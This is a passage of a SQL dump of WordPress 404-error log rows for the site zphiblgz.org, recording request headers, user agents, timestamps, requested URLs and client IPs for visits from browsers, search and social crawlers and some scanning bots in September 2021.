09:34:22',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'92.118.77.10'),(97081,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"HTTP_SEC_CH_UA\";s:76:\"\\\" Not;A Brand\\\";v=\\\"99\\\", \\\"Google Chrome\\\";v=\\\"65\\\", \\\"Chromium\\\";v=\\\"65\\\"\";s:21:\"HTTP_SEC_CH_UA_MOBILE\";s:2:\"?0\";s:12:\"HTTP_SEC_GPC\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:138:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631697868.3937160968780517578125;s:12:\"REQUEST_TIME\";i:1631697868;}}','notice','2021-09-15 09:24:30','2021-09-15 09:24:28',72736184,72819280,'http://zphiblgz.org/scholarship/application/',1,0,'5.153.180.30'),(97080,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631693682.7778289318084716796875;s:12:\"REQUEST_TIME\";i:1631693682;}}','notice','2021-09-15 08:14:44','2021-09-15 08:14:43',72605384,72689152,'http://zphiblgz.org/application',1,0,'54.166.27.188'),(97079,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:14:\"HTTP_SEC_CH_UA\";s:76:\"\\\" Not;A Brand\\\";v=\\\"99\\\", \\\"Google Chrome\\\";v=\\\"65\\\", \\\"Chromium\\\";v=\\\"65\\\"\";s:21:\"HTTP_SEC_CH_UA_MOBILE\";s:2:\"?0\";s:12:\"HTTP_SEC_GPC\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:138:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.99\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631691700.7089340686798095703125;s:12:\"REQUEST_TIME\";i:1631691700;}}','notice','2021-09-15 07:41:42','2021-09-15 07:41:41',72631504,72714600,'http://zphiblgz.org/scholarship/application/',1,0,'5.153.180.30'),(97078,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:10:\"PHP/6.2.53\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631691677.6057140827178955078125;s:12:\"REQUEST_TIME\";i:1631691677;}}','notice','2021-09-15 07:41:19','2021-09-15 07:41:17',72605408,72689144,'http://zphiblgz.org/scholarship/application/',1,0,'5.153.180.30'),(97077,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_ORIGIN\";s:19:\"http://zphiblgz.org\";s:12:\"HTTP_REFERER\";s:20:\"http://zphiblgz.org/\";s:15:\"HTTP_USER_AGENT\";s:60:\"PHP/{5|6|7}.{3|2}.{1|2|3|4|5|6|7|8|9|0}{1|2|3|4|5|6|7|8|9|0}\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631691674.742453098297119140625;s:12:\"REQUEST_TIME\";i:1631691674;}}','notice','2021-09-15 07:41:16','2021-09-15 07:41:14',72631672,72715512,'http://zphiblgz.org/scholarship/application/',1,0,'5.153.180.30'),(97076,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_ORIGIN\";s:19:\"http://zphiblgz.org\";s:12:\"HTTP_REFERER\";s:20:\"http://zphiblgz.org/\";s:14:\"HTTP_SEC_CH_UA\";s:76:\"\\\" Not;A Brand\\\";v=\\\"99\\\", \\\"Google Chrome\\\";v=\\\"63\\\", \\\"Chromium\\\";v=\\\"63\\\"\";s:21:\"HTTP_SEC_CH_UA_MOBILE\";s:2:\"?0\";s:12:\"HTTP_SEC_GPC\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:151:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5383.400 QQBrowser/10.0.1313.400\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631691661.244658946990966796875;s:12:\"REQUEST_TIME\";i:1631691661;}}','notice','2021-09-15 07:41:03','2021-09-15 07:41:01',72631600,72714696,'http://zphiblgz.org/scholarship/application/',1,0,'5.153.180.30'),(97074,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:9:\"TE, close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:7:\"HTTP_TE\";s:18:\"deflate,gzip;q=0.3\";s:15:\"HTTP_USER_AGENT\";s:35:\"SiteLockSpider [en] (WinNT; I ;Nav)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631687095.88198089599609375;s:12:\"REQUEST_TIME\";i:1631687095;}}','notice','2021-09-15 06:24:57','2021-09-15 06:24:56',72612784,72695720,'https://zphiblgz.org/th1s_1s_a_4o4.html',1,0,'184.154.139.21'),(97075,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631689217.6228020191192626953125;s:12:\"REQUEST_TIME\";i:1631689217;}}','notice','2021-09-15 07:00:19','2021-09-15 07:00:17',72623584,72707320,'http://zphiblgz.org/scholarship/application/',1,0,'45.93.80.28'),(97073,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"31\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631686036.48552608489990234375;s:12:\"REQUEST_TIME\";i:1631686036;}}','notice','2021-09-15 06:07:18','2021-09-15 06:07:16',72653208,72737840,'https://zphiblgz.org/accesson0.php',1,0,'185.191.34.215'),(97071,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:18:\"Go-http-client/1.1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631682790.2733700275421142578125;s:12:\"REQUEST_TIME\";i:1631682790;}}','notice','2021-09-15 05:13:11','2021-09-15 05:13:10',72337168,72420808,'http://zphiblgz.org/0993f819-b450-4df0-8cb5-81c310668029',1,0,'3.94.137.21'),(97072,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:11:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:18:\"Go-http-client/1.1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631682792.6206219196319580078125;s:12:\"REQUEST_TIME\";i:1631682792;}}','notice','2021-09-15 05:13:14','2021-09-15 05:13:13',72337224,72420864,'http://zphiblgz.org/0993f819-b450-4df0-8cb5-81c310668029',1,0,'3.94.137.21'),(97070,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/7.0 (compatible; MSIE 9.0; Windows 6.1; ru; ver:7.4) AppleWebKit/3.0.7 Chrome/71.6.4 AppleWebKit/22.8.8\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631682785.5844180583953857421875;s:12:\"REQUEST_TIME\";i:1631682785;}}','notice','2021-09-15 05:13:08','2021-09-15 05:13:06',72629872,72713512,'http://zphiblgz.org/0993f819-b450-4df0-8cb5-81c310668029',1,0,'3.94.137.21'),(97297,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632177062.509654998779296875;s:12:\"REQUEST_TIME\";i:1632177062;}}','notice','2021-09-20 22:31:04','2021-09-20 22:31:02',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'46.39.71.83'),(97295,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632167106.239675998687744140625;s:12:\"REQUEST_TIME\";i:1632167106;}}','notice','2021-09-20 19:45:08','2021-09-20 19:45:06',72604880,72688616,'http://zphiblgz.org/scholarship/application/',1,0,'87.251.86.235'),(97296,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:73:\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632174049.035048961639404296875;s:12:\"REQUEST_TIME\";i:1632174049;}}','notice','2021-09-20 21:40:50','2021-09-20 21:40:49',72612672,72695680,'https://zphiblgz.org/adverts/add/',1,0,'116.202.236.252'),(97294,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632166034.4036209583282470703125;s:12:\"REQUEST_TIME\";i:1632166034;}}','notice','2021-09-20 19:27:16','2021-09-20 19:27:14',72168848,72256112,'https://zphiblgz.org/event/youth-open-house/',1,0,'207.46.13.170'),(97293,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:9:\"TE, close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:7:\"HTTP_TE\";s:18:\"deflate,gzip;q=0.3\";s:15:\"HTTP_USER_AGENT\";s:35:\"SiteLockSpider [en] (WinNT; I ;Nav)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632164997.199695110321044921875;s:12:\"REQUEST_TIME\";i:1632164997;}}','notice','2021-09-20 19:09:59','2021-09-20 19:09:57',72612784,72695720,'https://zphiblgz.org/th1s_1s_a_4o4.html',1,0,'184.154.76.35'),(97292,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:10:\"HTTP_RANGE\";s:14:\"bytes=0-524287\";s:15:\"HTTP_USER_AGENT\";s:73:\"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\";s:20:\"HTTP_X_FB_CRAWLERBOT\";s:111:\"AansUazKaEmaQCrG4y8U159eX6fL0uf9e6fxi39KPKfCoE7TkZ-wgQBR3ar0Di6KE9ZIFwsmpXHNb6GoWKUhxsxpdOln779rAjkwtF5hgwv_Ei0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632159377.8663489818572998046875;s:12:\"REQUEST_TIME\";i:1632159377;}}','notice','2021-09-20 17:36:20','2021-09-20 17:36:18',72613232,72696216,'https://zphiblgz.org/scholarship/application/',1,0,'173.252.107.4'),(97291,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:10:\"HTTP_RANGE\";s:14:\"bytes=0-524287\";s:15:\"HTTP_USER_AGENT\";s:73:\"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\";s:20:\"HTTP_X_FB_CRAWLERBOT\";s:108:\"Aam3zS2_wsEOWAf5vX8X55WcUCPSIZSytd9uhNsR1rJnmvH0FnQhwe6Llg5f750m4SoLrczZ4FTR0pnJy2hO8YHmWVB8FKShQpw0yDB72ccJ\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1632159377.9743010997772216796875;s:12:\"REQUEST_TIME\";i:1632159377;}}','notice','2021-09-20 17:36:20','2021-09-20 17:36:18',72613232,72696216,'https://zphiblgz.org/scholarship/application/',1,0,'173.252.107.19'),(97290,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632155968.5757770538330078125;s:12:\"REQUEST_TIME\";i:1632155968;}}','notice','2021-09-20 16:39:31','2021-09-20 16:39:29',72746112,72829848,'http://zphiblgz.org/scholarship/application/',1,0,'46.161.11.21'),(97289,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:103:\"Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632152333.8999168872833251953125;s:12:\"REQUEST_TIME\";i:1632152333;}}','notice','2021-09-20 15:38:56','2021-09-20 15:38:54',72623552,72707288,'http://zphiblgz.org/scholarship/application/',1,0,'178.209.50.160'),(97287,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:50:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1632145573.394402027130126953125;s:12:\"REQUEST_TIME\";i:1632145573;}}','notice','2021-09-20 13:46:17','2021-09-20 13:46:13',72604880,72688616,'http://zphiblgz.org/scholarship/application/',1,0,'87.251.86.235'),(97288,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:11:\"HTTP_ACCEPT\";s:99:\"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\";s:19:\"HTTP_ACCEPT_CHARSET\";s:32:\"utf-8,windows-1251;q=0.7,*;q=0.7\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-us,en;q=0.6\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:14:\"max-age=259200\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2705.64 